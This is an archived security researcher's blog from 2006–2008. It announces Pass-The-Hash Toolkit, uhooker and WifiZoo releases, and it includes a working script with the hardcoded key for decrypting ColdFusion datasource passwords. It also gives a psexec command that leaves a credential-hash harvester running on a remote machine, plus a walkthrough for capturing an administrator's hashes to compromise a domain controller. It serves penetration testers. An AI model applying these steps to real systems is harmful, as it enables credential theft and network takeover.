http://hexale.blogspot.com
http://www.hexale.org/forums

What's new?:
(http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW)

*Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3
without requiring any update)

*New -t switch for whosthere/whosthere-alt: establishes interval used by the -i switch (by default 2 seconds).

*New -a switch for whosthere/iam: specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash)
The idea is that, if you find yourself in a version of Windows where
whosthere/iam don't work (and iam-alt/whosthere-alt don't work either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC script included in the Pass-The-Hash toolkit, and use the addresses found by the script with the -a switch.

This basically allows you to specify addresses at runtime to whosthere whithout
the need to recompile the tool.

*New -r switch for iam/iam-alt: Create a new logon session and run a command with
the specified credentials (e.g.: -r cmd.exe)

*genhash now outputs hashes using the LM HASH:NT HASH format

*several bugfixes and stuff

How to decrypt Coldfusion datasource passwords

2008-07-01T15:44:00.007-03:00

ColdFusion stores passwords for DataSources encrypted in the following XML files:

Coldfusion 7: \lib\neo-query.xml

for example: c:\CFusionMX7\lib\neo-query.xml

Coldfusion 8: \lib\neo-datasource.xml

for example: c:\coldfusion8\lib\neo-datasource.xml

the xml contains nodes/items like this:

<var name="password">
<string>maJsuHYMay8zpmptC2yibA==</string>

one for every data source.

Both Coldfusion versions use the same mechanism to encrypt the passwords;
this mechanism can be found in the following way:

Find \lib\cfusion.jar

Extract its contents

Decompile \coldfusion\sql\DataSourceDef.class

(use for example: cavaj Java decompiler: http://www.sureshotsoftware.com/cavaj/index.html)

You'll find the following code:

[..]
public class DataSourceDef {

[..]

protected static final String seedval = "0yJ!@1$r8p0L@r1$6yJ!@1rj";

[..]

protected String getPassword() {

if(password == null) { return null; }

if(password.equals("")) { return ""; }

else {

String pwd = null; String secKey = CFPage.generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"); pwd = CFPage.Decrypt(password, secKey, "DESede", "Base64"); return pwd;

}

[..]

And here's a simple script that will decrypt the passwords:

[..]

import pyDes
import base64
import sys

print "Coldfusion v7 y v8 DataSource password decryptor (c) 2008 Hernan Ochoa (hernan@gmail.com)"
print " "

if len(sys.argv) <>
print "syntax: coldfusion_ds_decrypt.py "
exit(0)

pwd = sys.argv[1]
key = "0yJ!@1$r8p0L@r1$6yJ!@1rj"

k = pyDes.triple_des(key)
d = k.decrypt( base64.decodestring(pwd), "*")

print "decrypted password: " + d

[..]

If you have compromised a machine with Coldfusion, you might find
useful to have these passwords to test them against the database server
and other servers (if you have control over the Coldfusion installation,
you can already execute sql code using cfm without knowing the password
for the datasource; but STILL it might be good to have these passwords,to access the database servers directly, they might be the same as the ones used for other remote admin accounts, etc
(I've seen it and I'm sure you have seen it too)).

If you have access to the Coldfusion administrator page (http://target/CFIDE/Administrator) you can go to the datasources section and you'll see the base64-encoded encrypted password for all the datasources.

Go to the 'DataSources Section'

Click on a 'DataSource' (e.g.: Test)

Look at the source code for the HTML page:

This is another method for obtaining the base64-encoded encrypted passwords,
instead of going to the XML files on disk.

Of course, if you have access to the administrator console already, you can do pretty much everything; I'm just saying this is a convenient method to obtain the password for later decryption.

Windows XP SP3 and Pass-The-Hash Toolkit: it Works!

2008-06-26T11:58:00.003-03:00

Ok, so Windows XP SP3 is out.

With this new version:

whosthere-alt.exe still works without requiring any modifications.
whosthere.exe does not work because this is the more 'gentle' and 'stealth' :) version of the tool and requires precise memory addresses.

But that's why I released the passthehash.idc IDA script; so you can easily get these addresses yourself.

And that's also the reason why the new version of whosthere.exe has a new -a switch that allows you to use specify these addresses without having to recompile the tool.

This new version is going to be released soon, but if you want it right now, email me (please, try to email me if you REALLY need it :)).

I haven't tested iam/iam-alt but the same thing observed with whosthere/whosthere-alt should apply to these tools.

In case you were wondering, the new addresses you need for Windows XP SP3 English are:

whosthere -a 75753BA0:7573FDEC:757D0C98:757D0CA0:757CFC60:757CFE54

(remember that whosthere-alt.exe works as it is on Windows XP SP3)

New features for pass-the-hash toolkit

2008-06-12T09:58:00.002-03:00

Hi,

I'm in the process of adding new features to the "pass-the-hash toolkit". This means I've found time to do it :), so.. If you have any ideas for new features/bugs that need to be addressed, please let me know.

I'm currently adding:

-better support for Windows Vista
-feature to specifiy addresses (such as the ones obtained via passthehash.idc) to whosthere and iam without having to recompile the tools

If you have any comments, please leave them here as comments to this blog post or
here:

http://www.hexale.org/forums/topic.php?id=3

Thanks!,
Hernan

Hexale forums

2008-06-04T11:58:00.002-03:00

Ok, so I finally set up a web site to put all my stuff on, checkout

www.hexale.org

well.. right now is empty :) but one thing I did installed is the forums
section, check out

www.hexale.org/forums/

There's a forum for each of the tools I have publicly released so far. Some
people have requested such a thing in the past, so here you go, I hope you
find it useful.

If there's another forum you'd like to see, please let me know.

-t switch added to whosthere and whosthere-alt

2008-06-04T00:24:00.001-03:00

Just wanted to let you know that I've added a -t switch both to whosthere and whosthere-alt

the -t switch sets the time interval used by the -i option (the option that waits indefinitely trying to capture new hashes)
before, the time interval was 2 seconds, now this can be set at will using the new -t switch

for example:

whosthere.exe -i -t 20
will attempt to gather new hashes every 20 seconds

whosthere-alt.exe -i -t 0.5
will attempt to gather new hashes every 0.5 seconds

This feature will be available on the next release, but if you really need it, just send me an email and I'll send you the new version with this feature included.

Comment on article about 'vm attacks' at www.eusecwest.com

2008-05-22T17:34:00.003-03:00

I was reading the following story:

http://www.eusecwest.com/justin-ferguson-interpreter-vm-attacks.html

I'll keep my subjective opinion about the article to myself and will focus on the following:

I think that the use of the function 'sys._getframe()' mentioned in the article as a way to 'obtain a heap address' is 'misleading' .

Python gives away memory addresses all the time, there's no need to call a 'weird' function (sys._getframe() is not weird anyways):

(from http://shell.appspot.com/, but applicable to any python deployment):

>>> a = 'mythbusters'
>>> id(a)
6912173043421908880
>>> hex(id(a))
0xe81da54d11f45f88L'
>> sys._getframe()
frame object at 0xe81da54d1ff6afc8

both addresses are clearly in the same 'range', so I can infer they 'refer' to the same 'thing', if the 'thing' is the 'heap', then both methods 'leak' a heap address,
or more importantly, they 'leak' the same 'thing' :)

or

(on a windows machine)

>>> class a:
... def test(self):
... print 'hola'
...
>>> j = a()
>>> j
__main__.a instance at 0x004AF0F8
>>> sys._getframe()
frame object at 0x00475960

and finally (done at from http://shell.appspot.com/)

>>> import os
>>> os.uname()
('Linux', '', '', '', '')

If you think I'm wrong, please comment!

Using whosthere.exe with psexec

2008-05-08T16:45:00.002-03:00

Ok, a few days ago I received the following question and I have been asked the same thing before so here it goes:

The question, more or less, is:

How do you run whosthere.exe into a remote machine using psexec dettached from any console and leave it running there collecting hashes?

the answer is:

psexec \\ -d -c whosthere.exe -o myhashes.log -i

psexec's -d switch basically makes it run whosthere.exe and exit.
whosthere's -o switch specifies the name of the file containing the list of unique credentials collected.
and the -i switch makes whosthere.exe run in an infinte loop looking for new
logon credentials and storing them on the file specified by the -o switch.

Remember, of course, you will probably need to specify the -u and -p switch to psexec, or you can do from your machine something like

net use \\\ipc$ * /u:user password

and then run psexec.

Also remember, that if you want to use whosthere-alt.exe, you can't use psexec's -c switch (I think), because whosthere-alt.exe also requires the pth.dll, so you will probably need to copy whosthere-alt.exe and pth.dll to the target machine and then run psexec without the -c switch and specifying the path where whosthere-alt.exe and pth.dll are located.

Hope it helps!.

Release: Pass-The-Hash toolkit v1.3

2008-02-29T16:21:00.001-02:00

SOURCE CODE:
http://oss.coresecurity.com/pshtoolkit/release/1.3/pshtoolkit_v1.3-src.tgz

BINARIES:
http://oss.coresecurity.com/pshtoolkit/release/1.3/pshtoolkit_v1.3.tgz

DOCUMENTATION:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html

WHATSNEW:

Pass-The-Hash Toolkit 1.3 by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com)
=====================================================================================

What's new?:

* PASSTHEHASH.IDC: This .IDC IDA Pro script can be used to obtain the addresses
iam and whosthere need to obtain/modify logon session credentials. Load LSASRV.DLL
into IDA Pro (make sure to import the symbols) and run the script to get the
addresses you need to add to the source code to add support for the LSASRV.DLL version
you have, in case it is not supported yet.
If you use the script, please send me the addresses so I can include them in
the next version of the toolkit.

* IAM-ALT and WHOSTHERE-ALT: two new tools written from scratch that do the
same thing that IAM and WHOSTHERE do but using a slightly different technique,
aiming at making the tool work on more systems without requiring users to
modify the source code of iam/whosthere (or wait for the next version:)).

The good thing about this 'alt' version of the iam/whosthere tools is that
they SHOULD work on more windows versions without modifications.
The 'bad' thing is that both tools need to execute code inside lsass.exe.
The tools basically use the functions MSV1_0.DLL!NlpDeletePrimaryCredential,
MSV1_0.DLL!NlpAddPrimaryCredential, and MSV1_0.DLL!NlpGetPrimaryCredential;
these are the functions gsecdump uses (if I'm not mistaken).
The current heuristics used to find the functions inside MSV1_0.DLL is horrible
but it works.

whosthere uses a method tha allows it to obtain credentials just by
reading memory, without executing any code. iam does not, but just
because I'm lazy, it will do it eventually, the downside to this approach
is that although it does use heuristics to verify hardcoded addresses, it
does have hardcoded addresses anyways.And that's why to help solve this issue
but at the same time maintain the possiblity of obtaining credentials
without executing code inside lsass.exe, I created the passthehash.idc
script. If you don't care about executing code inside lsass.exe, use
whosthere-alt.

*iam/whosthere: Added support for more windows versions. including different languages.

*iam/iam-alt: new syntax. now you have to use -h to specify the credentials.

*whosthere/whosthere-alt: new -o switch to dump credentials to a file

*whosthere/whosthere-alt: new -i switch that will make whosthere/whosthere-alt
display current logon credentials found in memory and then wait forever for
new logon sessions and display only those new sessions. you can use this switch
together with the -o switch to dump credentials found to a file. Now you can leave the
tool running and it will log all unique interactive logon sessions created, it makes
easier the job of waiting for the administrator to log into the compromised
machine where whosthere/whosthere-alt is running. Thanks to heathengod for the
idea of this feature.

*several bugfixes and stuff

Pass-The-Hash Toolkit v1.2 released.

2008-01-21T14:42:00.000-02:00

Pass-The-Hash Toolkit v1.2 is available.

What is Pass-The-Hash Toolkit?

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).

Direct download links:
source code:
http://oss.coresecurity.com/pshtoolkit/release/1.2/pshtoolkit_v1.2_src.tgz
binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.2/pshtoolkit_v1.2.tgz

More info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html

what's new:
http://oss.coresecurity.com/pshtoolkit/release/1.2/WHATSNEW

WifiZoo v1.3 released!

2008-01-21T10:31:00.001-02:00

Hi!,

I have just released WifiZoo v1.3.
This is a minor release addressing minor but annoying things people kept poking me about.
I promise a more substantial release soon :).

What's new?

Direct download link:
WifiZoo v1.3

Info about WifiZoo:
WifiZoo Info

New version of Pass-The-Hash Toolkit about to be released!

2008-01-18T07:30:00.000-02:00

Hi!,

I'm about to release a new version of Pass-The-Hash Toolkit. I can't remember all the things fixed and things that changed, but they are on a file somewhere :), some of them include:

* The elimination of the "-B" switch, now the tool does what it has to do without requiring anything from you
* the output from whosthere.exe is now shorter and the format credentials are presented can now be directly used with l0phtcrack or anything like that (although, doing so kind of goes against the very nature of the iam.exe tool :), but it's ok, for some scenarios you want to know the plaintext password).
* All the extra info displayed by whosthere.exe before is still available via the -D switch (D as in debug info :)).
* Added support for several windows versions and languages

So, before I release the next version, it would be great if you can send me an email to hernan@gmail.com with errors you might have found and want fixed, ideas for new features, etc. please, write! :).

Release uhooker v1.3

2007-12-17T10:31:00.000-03:00

What's uhooker?:

A tool to intercept and manipulate execution of programs. It enables the user to insert hooks in function calls and arbitrary addresses within the executable file in memory. The hooks handlers are written in Python and can be changed at runtime without the need to restart the inspected process.

Download:

http://oss.coresecurity.com/uhooker/release/1.3/uhooker_v1.3.tgz

http://oss.coresecurity.com/uhooker/release/1.3/uhooker_v1.3.zip

more info:

http://oss.coresecurity.com/projects/uhooker.htm

http://oss.coresecurity.com/uhooker/doc/index.html

Some Videos:

http://oss.coresecurity.com/uhooker/doc/uhooker_changeconnect.wmv
http://oss.coresecurity.com/uhooker/doc/uhooker_sendhex.wmv

What's new in uhooker v1.3?
===========================

-Several bug fixes, everything should work better than before :)

-Fixed bug with readunicode() API where reading empty multibyte strings,
resulted in the plugin freezing for ever.

-Now you can load multiple .CFG files (load one, then load another to hook
something else, etc). Previously, you were only allowed to load one .CFG file
with breakpoints/handlers definitions. Now you can load as many as you like
whenever you want.

-If a .CFG file overlaps previously set hooks, you have the chance
to redefine them (for example, you can dinamically change the
file/function handling the breakpoint. This adds to the feature
present since the first version of uhooker that allows runtime rewriting
of the handler's code).

-Errors in the code of the handlers (written in python) are now correctly handled.

-Previously, if you had an error in the code you wrote to handle
certain breakpoint, this caused the 'uhooker's python server' to
'crash', and you needed to restart your debugging session all over
again.

This scenario was very common, particuarly if you were developing
your own handler/script for the first time, or if you were
modifying at runtime the code of a handler/script.

Well, no more! :), Now if you have an error (syntax error,
identation error, general programming error,etc), the error that
your handler has will be displayed on the uhooker's console, and
you'll be able to recover from that error. This improvement means:

1-If an error occurs on the code, you don't
need to restart the debugger's session (and lose
the state of the program, etc.).

2-If you are changing in runtime the code of the
handler, and you makee a mistake, you'll see what
caused the error, and you can fix the script/handler
and move on!.

-and there are probably more things but I didn't write them down and now I dont't remember :).

uhooker videos - tcpnet.py video

2007-12-12T15:07:00.000-03:00

A new video showing how to use the tcpnet.py script, this is a sample script
that allows you to intercept and modify network traffic using an hex editor.

Embedded Video (only IE I think)

http://oss.coresecurity.com/uhooker/doc/uhooker_sendhex_video.html

Direct Download

http://oss.coresecurity.com/uhooker/doc/uhooker_sendhex.wmv

Uhooker Videos

2007-12-04T09:12:00.000-03:00

Hi All!,

I'm uploading new scripts for uhooker and also new videos showing how these scripts are used, to help you get an idea of the purpose of the scripts.

I just uploaded a video showing how to use the Change Connect() script, you can find it here:

Embedded in browser:

http://oss.coresecurity.com/uhooker/doc/change_connect_video.html

Direct Download of .WMV file (if using firefox, you will probably
need to download this one):

http://oss.coresecurity.com/uhooker/doc/uhooker_changeconnect.wmv

Note: If anyone knows of a free program to do screencasts & convert screencasts
to .SWF files(flash), please let me know. I'm currently doing it using 'Windows
Media Encoder', and I couldn't find a decent program to convert .WMV
to Flash. Any suggestion is welcome.

New 'Change Connect()' uhooker script

2007-11-30T12:36:00.000-03:00

I uploaded the following uhooker script:

Change Connect(): This script displays all calls to connect() and allows you to change the IP address:Port of the connection. This is useful for debugging, to redirect traffic to some other place instead of the original server, for example, you can redirect traffic to proxy_hooker and use the 'Visual Fuzzing :)' script to observe/modify traffic.

Available here:
http://oss.coresecurity.com/uhooker/doc/index.html#scripts

Direct Download:
http://oss.coresecurity.com/uhooker/doc/change_connect.cfg
http://oss.coresecurity.com/uhooker/doc/change_connect.py

New & Updated Uhooker scripts

2007-11-29T09:26:00.000-03:00

I updated the uhooker scripts on the uhooker's web page (http://oss.coresecurity.com/uhooker/doc/index.html) some of them were pre-1.2 but did not work with uhooker v1.2 because of minor things, but anyways, now you can download them and they will work :).

I also 'improved' and added the following scripts:

Intercept Network Traffic With Hex Editor: These scripts will intercept sendto(), send() and recv() and for every packet received, an hex editor will be displayed. You can use the hex editor to change bytes of the packet, and then close it to pass the modified packet to the application. Is fuzzing with a GUI! :).
tcpnet.cfg
tcpnet.py
udpnet.cfg
udpnet.py

I'll try to create an screencast so you can get a visual idea of what these scripts do. I'm gonna start uploading some other scripts I think you may find useful.

And.. I've also changed the 'look and feel' of the uhooker's web site, mmm, if you think is bad now go to web.archive.org and prepare to be amazed!.

Anti-debugging Techniques

2007-11-19T08:45:00.000-03:00

I just woke up and saw this article that caught my attention (yes, i have a problem, the first thing i read in the morning is not the newspaper but securityfocus.com)

Windows Anti-Debug Reference

by Nicolas Falliere

I haven't read it yet, but i'm a sucker for articles/papers with hex numbers and assembler source code :).

I'll read it later today and make a post if i can think of sthg worth saying about it :).

WifiZoo working on the Nokia N800

2007-11-17T15:28:00.000-03:00

Yes!, wifizoo works on the Nokia N800! this is very cool! you won't need to carry around your notebook on your next wireless assessment! :)

Thanks go to Matias Brutti, he's the proud owner of the N800 :) and he's the one that made it work. It is actually pretty straightforward, you only need to change a few lines of code.

For more info and photos, click here.

Simple script to automatically generate uhooker hooks

2007-11-07T16:29:00.000-03:00

I've just uploaded a very simple script that can be used to automatically generate hooks for all the functions exported by a DLL to be used with uhooker.

So, let's say you want to intercept all the functions exported by kernel32.dll? well,
having to write by hand the .cfg file and the .py file with the handlers can be a daunting task :), it has hundreds of functions.

So, instead of doing that, just use genhooks.py like this:


genhooks.py -f kernel32.dll -t b -c kernel32.cfg -p kernel32.py


-f: specifies the name of the DLL
-t: specifies the hook type. b = before, a = after, * = address (you would normally use b or a)
-c: OPTIONAL. specifies the name of the .cfg file. if it is not specified, the dllname_without_the_extesion.cfg will be used
-p: OPTIONAL. name of the .py file with the hooks for all the functions. if it is not specified the dllname_without_the_extension.py will be used.

And that's it. It's a very simple script that I coded 300 hundred times already, the only difference is that now I'm keeping a copy around :).

The script can be found here:

http://oss.coresecurity.com/uhooker/doc/index.html#scripts

Direct download link:

http://oss.coresecurity.com/uhooker/scripts/genhooks.py

Patching WifiZoo to support kismet dumps/pcap capture files

2007-11-07T13:11:00.001-03:00

A user emailed me asking for a way to use kismet dumps/pcap capture files with WifiZoo, this is going to be included in the next version of WifiZoo, but you can patch/hack the current version to support kismet dumps/pcap capture files very easily:

Edit wifizoo.py and change the following code:


webproxy.start()
print "Waiting..."

while 1:
  # mm, would be better to use callback perhaps. TODO
  p = sniff(filter=None, iface=conf.iface, count=1)
  pkt = p[0]

to:


webproxy.start()
print "Waiting..."

#capture.pcap is the name of the capture file. Yes, it's hard-coded :)
pcapr = PcapReader('capture.pcap')

while 1:
  # mm, would be better to use callback perhaps. TODO
  #p = sniff(filter=None, iface=conf.iface, count=1)
  pkt = pcapr.next() 
  #pkt = p[0]

Is a quick hack, but it works.

Numb

2007-11-02T09:46:00.000-03:00

I'm still here! hang on! soon I'll be releasing a new version of wifizoo, a new version of the pass-the-hash toolkit and also new stuff/scripts and probably a new version of the universal hooker too!

Soon!

New version of WifiZoo v1.2

2007-10-02T17:47:00.000-03:00

WifiZoo v1.2:

-Bug Fixes
-It now has a web GUI running on localhost:8000, it will hopefully make its use more 'convenient'
-And it also has an 'http proxy' ala ferret/hamster. You can display the captured cookies with the web gui, clicking on a cookie will set that cookie on the wifizoo proxy. Set your browser to use the proxy, and again, hopefully, that will do the trick.

Updated docs:
http://community.corest.com/~hochoa/wifizoo/index.html

Direct download link:
http://community.corest.com/~hochoa/wifizoo/wifizoo_v1.2.tgz

Thanks!,
Hernan

WifiZoo and cards without Prism headers

2007-09-19T16:08:00.000-03:00

If you card does not output PrismHeaders, chances are WifiZoo is going to break, sorry, didn't bother to check that one :). The good news is that I already modified the code to check if prism headers are available or not, and if they are not, the code now can handle that situtation and everything will work fine.
This 'fix' is going to be included in the next version, but if anyone wants the fix right now, please send me an email (hernan [at] gmail.com) and I'll send you the version that supports cards that do not output prism headers.

New version of wifizoo v1.1

2007-09-18T03:11:00.000-03:00

I fixed some bugs, probably added some new ones, and new functionality is also in the new version of WifiZoo. Some of the new functionality is that wifizoo now keeps track of probe requests and can also graph what SSIDs are being 'probe requested' from what SRCs. I find it useful or at least interesting, hope you do to :).

You can get it here:

http://community.corest.com/~hochoa/wifizoo/index.html

The direct download link is the following:

http://community.corest.com/~hochoa/wifizoo/wifizoo_v1.1.tgz

(if you click the last link, you miss the graph samples :))

WifiZoo - playing with 802.11

2007-09-07T14:21:00.000-03:00

I've been playing around with wireless, heard about Ferret from Errata Security which although is nothing spectacular, I do believe is a fun/useful tool to have.
I also wanted a tool to leave unattended, hopping thru all 802.11 channels, go read a book, come back, and get some useful information from it. I also wanted to make graphs of stuff, because everybody loves graph, and I do too :). I really believe data representation is very important and changes everything.

So I basically reinvented the wheel, added some stuff to it, everything using python, and came up with WifiZoo.

You can check it out at http://community.corest.com/~hochoa/wifizoo/index.html. You can find a detailed description of the tool in the previous link.

Again, is nothing spectacular, but is a fun tool to use on wireless penetration tests, it works, still lots of functionality needs to be added, but again, it gets the job done. For now, I take the tool as a fun exercise to spend time on from time to time :).

New Pass-The-Hash info web page

2007-09-05T17:05:00.000-03:00

I just added some more info about Pass-The-Hash here:

http://oss.coresecurity.com/pshtoolkit/doc/index.html

It includes scenarios, workarounds, possible issues etc.
I'll be adding more info from time to time, so check it out periodically if you are interested in the tool.

Pass-The-Hash Toolkit v1.1 Released

2007-09-04T14:57:00.000-03:00

I just released Pass-The-Hash Toolkit v1.1. This release has support for more targets, including german/french versions of Windows XP SP2, and also Windows Server 2003. I added a -B switch that tells IAM.EXE and WHOSTHERE.EXE to look for the necessary memory addresses in runtime using some 'heuristics', this should also make it work on more targets.

I expect people to continue having issues on some platforms because the things the tool does are dependant on certain memory areas that vary from OS version to OS version, so, if you have issues, please let me know, most of the time is very easy to add support for your platform to the tool.

The source code is available here.

The binaries are available here

WHATSNEW:

-Improved support for windows xpsp2 german/french, windows 2003 sp1/sp2, both for
IAM.EXE and WHOSTHERE.EXE
-Added to IAM.EXE and WHOSTHERE.EXE the -B switch. If IAM.EXE or WHOSTHERE.EXE is
not working in your configuration, please run the tools again specifying -B at the end.
The -B option will try to find, using 'heuristics', the addresses the tools need
to do what they do. If you are still having issues, please let me know, I expect people
to have issues because the addresses vary from OS version to OS version.

Note for Windows Server 2003 users:

-if you run IAM.EXE and it ends as expected, as If it had worked, but then you run
WHOSTHERE.EXE and the credentials did not change, do the following:

-start a cmd.exe using runas, for example:

runas /user:administrator cmd.exe

-and in the new console run IAM.EXE, and then WHOSTHERE.EXE to verify. And now
it should work.

It seems that sometimes you need a new session different than the interactive
session for LSASS.EXE to accept the modifications to the credentials in memory. If
you are logging to the machine remotely using psexec/Remote Desktop etc this does
not to occur (at least, this is what I observed), I had troubles like this when
logging interactively to the server. Also after you run 'runas', running IAM.EXE
in a regular CMD.EXE shell will start working. Don't take any of this as
a precise explanation of what's going on, this is just what I observed and a way
to work around it. I'll analyze what's really going on in the future..

Did you know?: tar files contain your username and group name?

2007-08-24T23:03:00.000-03:00

Well, yes, that's right! take a look at the tar file format here, specifically at the 'USTAR format':

So at +265 you have the 'Owner user name' and at +297 'Owner group name'.
let's try it:

yes, 'hernan' , that's me, 'wheel', yes, that's the group name.
Now go to google and do some 'filetype:tar'/'filetype:tgz' etc. searches
and have fun!. :)

Pass-The-Hash Toolkit and LSASRV.DLL

2007-08-17T16:44:00.000-03:00

One quick note: IAM.EXE reads at specific locations of LSASRV.DLL's address space to obtain data necessary to encrypt the credentials before changing them and other stuff. For that reason, IAM.EXE has specific code that checks for the LSASRV.DLL version present on the system where it is run, and if it does not match with the ones I know, the program exits.

The idea behind this is to avoid situations where you would run the tool in a system that doesn't have the correct LSASRV.DLL version most likely crashing the LSASS.EXE process and having to reboot your machine. not good :).

So, if you run IAM.EXE and get something like this:

Checking LSASRV.DLL....Unknown LSASRV.DLL.
LSASRV.DLL: 00050001h. A280884h

It means I don't know about your DLL version. Please send me an email with the version number you have and I'll do my best to get a hold of a copy of that exact DLL version to solve the issue. (when you are at it, also send me the text representation of the DLL version just in case , just rigth-click the DLL, properties->Version->File
Version, and also the language of your windows installation, etc.)

I'll try to come up with a generic solution for this, but since the tool is mostly intended to be run on your own machine and not to be used to compromise a machine or whatever, I didn't think it would matter much to make it generic. This should not be difficult to implement.

On the other hand, WHOSTHERE.EXE does not have such checks because it only reads memory, so when it fails, you only get invalid output; the worst thing that can happen is WHOSTHERE.EXE itself crashing.

Release of Pass-The-Hash Toolkit v1.0 for Windows

2007-08-15T21:13:00.000-03:00

Ok, so today I'm releasing a tool whose origins go back to 2000, but here it is now, I hope you find it useful, interesting or at least amusing :), any feedback is welcome!!.

I'm releasing Pass-The-Hash Toolkit v1.0, you can find it here:
http://oss.coresecurity.com/projects/pshtoolkit.htm.

source code:
http://oss.coresecurity.com/pshtoolkit/release/1.0/pshtoolkit_src_v1.0.tgz

binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.0/pshtoolkit_v1.0.tgz

For those of you that do not want to read the detailed description :),
in a nutshell, it is pass-the-hash for windows (iam.exe), for example:

iam.exe administrator mydomain 0102030405060708090A0B0C0D0E0F10
0102030405060708090A0B0C0D0E0F10

After running the program, outbound network connections that use NTLM
authentication will use the new credentials. And a tool
(whosthere.exe) to list currently logged on users and their NTLM
credentials by reading LSASS.EXE's internal structures (see the 'long
description' for use cases).

And now the long description:

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows
Logon Sessions mantained by the LSA (Local Security Authority)
component. These tools allow you to list the current logon sessions
with its corresponding NTLM credentials (e.g.: users remotely logged
in thru Remote Desktop/Terminal Services), and also change in runtime
the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH
on Windows!).

Utilities in the toolkit:

* IAM.EXE: Pass-The-Hash for Windows. This tool allows you to
change your current NTLM credentials withouth having the cleartext
password but the hashes of the password. The program receives a
username, domain name and the LM and NT hashes of the password; using
this it will change in memory the NTLM credentials associated with the
current windows logon session. After the program performs this
operation, all outbound network connections to services that use for
authentication the NTLM credentials of the currently logged on user
will utilize the credentials modified by IAM.EXE. This includes 'net
use', 'net view', many third-party DCOM services that use NTLM
authentication, etc. This is basically 'pass-the-hash' for windows;
one of the main advantages is that you don't need to use a modified
version of samba or samba-tng and be restricted to the limited
functionality they implement, you can now use windows and any
third-party software with stolen hashes withouth having to obtain the
cleartext version of a password. For more information take a look at
this paper I wrote back in 2000 Modifying Windows NT Logon Credentials
(http://www.coresecurity.com/index.php5?module=ContentMod&action=item&id=1030).

* WHOSTHERE.EXE: This tool will list the current logon sessions
with NTLM credentials (username,domain name, LM and NT hashes). Logon
sessions are created by windows services that log in using specific
users, remote desktop connections, etc. This tool has many uses, one
that i think is interesting: Let's say you compromised a Windows
Server that is part of a Windows Domain (e.g.: Backup server) but is
NOT the domain controller. Since it is not the domain controller, you
only have access to the local SAM and although you did effectively
comprise a sensitive server you did not compromise the domain.
However, it is very common in such situations to find that
administrators are using Remote Desktop to connect to the compromised
server to perform different tasks. So this is your chance, just wait
for the administrator to log into the compromised server using remote
desktop, at that point, run 'WHOSTHERE.EXE' and you will observe the
administrators username,domain name, and NTLM hashes. Now go to your
machine, use them with IAM.EXE and compromise the domain controller
using the administrator's credentials.

* GENHASH.EXE: This is a small utility that generates LM and NT
hashes using some 'undocumented' functions of the Windows API. This is
a small tool to aid testing of IAM.EXE.

Bind IIS to an IP address

2007-07-27T18:35:00.001-03:00

Let's say you want IIS 5.0 not to bind to 0.0.0.0 and want it to bind to a specific IP address. You can go to Administrative Tools->Internet Information Services, and then to "server name"->Web sites->Default Web site, right-click, properties, go to the 'Web Site' tab, and in 'Web Site Identification' put the IP address you want IIS to bind to or click the 'Advanced' button to select more than one IP.

And you are all set... well... you are not :). IIS implements something called 'Socket Pooling' and if you have this enabled it basically makes IIS bind to all available IP addresses. So even when you go to the GUI and change the IP you want IIS to bind to, IT DOESN'T WORK. In order to make it work, you need to disable 'Socket Pooling', and you can do so with the following command:

script adsutil.vbs set w3svc/disablesocketpooling true

I just thought this was amusing and decided to make a post :). Something similar occurs with IIS 6.0 but I have not tried it yet. You can get more information here:

IIS 5.0:

IIS Binds to All Available IP Addresses When It Starts

How to Disable Socket Pooling

IIS 6.0:

IIS 6.0: Setting Metabase Property DisableSocketPooling Has No Effect

Gera releases HeapDraw / HeapTracer

2007-07-26T11:54:00.000-03:00

Check out Gera's new tool!:

"HeapDraw was originally created as a postmortem analisys tool, to see how the heap evolved during the life of a process. The idea is that although we may be used to textual output, like that of ltrace or a malloc/free hooking library, it's much better to see it graphically (in fact I used to make drawings by hand until I realized "WTF am I doing? I have a computer to do it for me!").
HeapTracer is the new name, after it became a runtime analisys tool."

You can find it here.

www.live.com default error message

2006-11-27T14:59:00.000-03:00

OK, this is just funny, I guess microsoft was in a hurry to release the www.live.com search engine and didn't have time to come up with a nice error page; although they seemed to spend months to create a 'chan' windows sound..

click

uhooker v1.2 is out!

2006-09-28T12:39:00.000-03:00

I released uhooker v1.2. some bug fixes, structural changes and new functionality.
you can download it from
or directly from http://oss.coresecurity.com/uhooker/release/1.2/uhooker_v1.2.tgz (tgz)
or http://oss.coresecurity.com/uhooker/release/1.2/uhooker_v1.2.zip (zip)
checkout the doc pages because Im constantly posting new stuff like sample scripts, etc.;
and also in this version there's a minor modification you'll have to make to your
existing scripts to make them work with version 1.2
http://oss.coresecurity.com/uhooker/doc/index.html
See http://oss.coresecurity.com/uhooker/release/1.2/WHATSNEW_1.2.txt for
a complete list of changes.

Uhooker v1.1 is out!

2006-07-01T10:55:00.000-03:00

ok, I uploaded uhooker v1.1. some bug fixes and new functionality.
you can download it from http://oss.coresecurity.com/projects/uhooker.htm
or directly from http://oss.coresecurity.com/uhooker/release/1.1/uhooker_v1.1.zip.
checkout the doc pages because Im constantly posting new stuff, sample scripts, etc.
http://oss.coresecurity.com/uhooker/doc/index.html

Release of the Universal Hooker

2006-06-23T16:56:00.000-03:00

Ok, I'm relasing the 'universal hooker', A tool I wrote and have being using for a couple of years now. I have many versions/implementations of the same idea, but the one I'm releasing now works as an OLLYDBG plugin.

You can get more information about 'uhooker' in http://oss.coresecurity.com/projects/uhooker.htm

